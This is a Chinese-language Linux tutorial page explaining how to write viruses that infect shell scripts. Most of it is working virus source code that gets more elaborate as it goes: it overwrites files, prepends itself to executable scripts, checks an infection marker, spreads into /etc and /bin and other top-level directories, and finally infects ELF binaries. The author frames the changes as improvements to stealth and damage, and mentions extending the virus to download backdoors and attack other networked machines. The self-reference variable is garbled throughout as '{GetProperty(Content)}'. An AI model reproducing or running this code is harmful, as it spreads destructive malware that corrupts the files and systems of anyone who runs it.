Linux教程網 >> Linux基礎 >> Linux服務器 >> 感染Linux系統腳本程序的病毒技術介紹

感染Linux系統腳本程序的病毒技術介紹

日期：2017/3/2 16:59:02 编辑：Linux服務器

主要的Shell病毒技術

當然,本文需要你至少了解Linux Shell編程的基礎知識和一星點的病毒知識。OK！我們進入正題!

我們來看一個最原始的shell病毒,代碼最能說明問題:

#shellvirus I
for file in *
do
　cp {GetProperty(Content)} $file
done

簡單吧？遍歷當前文件系統的所有文件，然後覆蓋所有文件。但是,我們知道linux是多用戶的操作系統，它的文件是具有保護模式的，所以以上的腳本有可能會報出一大堆的錯誤，所以它很快就會被管理員發現並制止它的傳染。所以我們可以為該腳本做個判斷，這樣隱蔽性就大大增強了：

#shellvirus II
for file in *
do
　 if test -f $file
　 then
　　if test -x $file
　　then
　　 if test -w $file
　　 then
　　　if grep -s echo $file >.mmm
　　　then
　　　cp {GetProperty(Content)} $file
fi; fi; fi; fi; fi
done
rm .mmm -f

ok.我們改進了一下,加了若干的判斷，判斷文件是否存在，是否文件可執行，是否我們有權限寫,再判斷它是否是腳本程序如果是就cp {GetProperty(Content)} $file，所以這段代碼是感然該系統所有的腳本程序的，危害性還是比較大的。

if grep -s echo $file>/.mmm

這句也可以這樣寫:

if file $file | grep -s 'Bourne shell script' > /dev/nul ; then,也就是判斷file是否為shell腳本程序。但是,腳本病毒一旦在感染完畢之後就什麼也不做了，它沒有象二進制病毒那樣的潛伏的危害性,而且以上的腳本只是簡單的覆蓋宿主而已,所以我這裡利用了一下傳統的二進制病毒的感染機制,效果也不錯:)，看看下面代碼:

#infection
head -n 24 {GetProperty(Content)} > .test　　　　<-取自身保存到.test
for file in *　　　　　　<-遍歷文件系統
do
　if test -f $file　　　　<-判斷是否為文件
　then
　　　if test -x $file　　　　<-判斷文件是否可執行
　　　then
　　　　　 if test -w $file　　<-判斷文件是否可寫
　　　　　 then
　　　　　　 if grep -s echo $file >.mmm　　<-判斷是否為腳本程序
　　　　　　 then
　　　　　　　 head -n 1 $file >.mm　　　　<-提取要感染的腳本程序的第一行
　　　　　　　 if grep -s infection .mm >.mmm　　<-判斷該文件是否已經被感染
　　　　　　　 then
　　　　　　　　rm -f .mm　　　　　　<-已經被感染,則跳過
　　　　　　　 else　　　　　　　　<-還未被感染
　　　　　　　　cat $file > .SAVEE　　　　<-很熟悉吧?借用了傳統的二進制文件的感染機制
　　　　　　　　cat .test > $file
　　　　　　　　cat .SAVEE >> $file
　fi; fi; fi; fi; fi
done
rm .test .SAVEE .mmm .mm -f

程序的注解足以說明了,其實增加了潛伏的危害性,但還是特容易被發現,沒辦法的事情,shell腳本一般都是明文的，呵呵。不過危害性已經相當大了.這段程序用了一個感染標志:infection來判斷是否已經被感染,著在程序中可以反應出來。

ok,為了使上面的代碼不容易被發現，我必須優化它，最先考慮的肯定是精練代碼：

#infection
for file in * ;　do
　if test -f $file && test -x $file && test -w $file ; then
　 if grep -s echo $file > /dev/nul ; then
　　head -n 1 $file >.mm
　　 if grep -s infection .mm > /dev/nul ; then
　　　rm .mm -f ; else
　　　 cat $file > .SAVEE
　　　 head -n 13 {GetProperty(Content)} > $file
　　　 cat .SAVEE >> $file
fi; fi; fi
done
rm .SAVEE .mm -f

現在只有兩個臨時文件的產生了,代碼也被精簡到了13行.當然可以完全用;來把代碼甚至寫到1-2行,但這裡我只是說明問題,就

不寫出來了.

好,我們看看,shell病毒還能做哪些有用的事情,有可能我們想感染別的目錄的文件,比如根目錄或者是/etc,/bin等等,因為大多

數有用的系統配置腳本都存放在那些目錄下,只要對上述代碼稍作改動就可以實現了:)

#infection
xtemp=$pwd　　　　　　　　<-保存當前路徑
head -n 22 {GetProperty(Content)} > /.test
for dir in /* ; do　　　　　　<-遍歷/目錄
if test -d $dir ; then　　　　<-如果是目錄就cd該目錄
　cd $dir
　for file in * ; do　　　　　　<-遍歷該目錄文件
　 if test -f $file && test -x $file && test -w $file ; then　　<-確定文件是否可執行,可寫
　　if grep -s echo $file > /dev/nul ; then　　　　　　<-確定是否為腳本程序
　　　head -n 1 $file > .mm
　　　if grep -s infection .mm > /dev/nul ; then　　　　<-確定是否已經被感染
　　　 rm .mm -f ; else
　　　　cat $file > /.SAVEE　　　　　　　　<-和前面的感染機制一樣感染未被感染的腳本程序
　　　　cat /.test > $file
　　　　cat /.SAVEE >> $file
　 fi; fi; fi
　done
　cd ..
fi
done
cd $xtemp　　　　<-返回原目錄
rm /.test /.SAVEE .mm -f

其實這段代碼只感染了/目錄下的一層目錄.當然我們可以使它感染的更深,只是加幾個循環而已.同樣shell病毒可以做很多事情

如download後門程序,為機器自動開後門,主動去攻擊聯網的其他機器,取用戶的email來發送傳染等等.總之它的實現技術不高深,

但也比較實用,還是值得去說明一下的,呵呵.

同樣,我們也可以感染elf文件,但危害性很小,這裡不重點講,給個例程大家理解一下吧。

for file in * ;　do
　if test -f $file && test -x $file && test -w $file ; then
　 if file $file | grep -s 'ELF' > /dev/nul ; then
　　mv $file .$file
　　head -n 9 {GetProperty(Content)} > $file
fi; fi
done
.{GetProperty(Content)}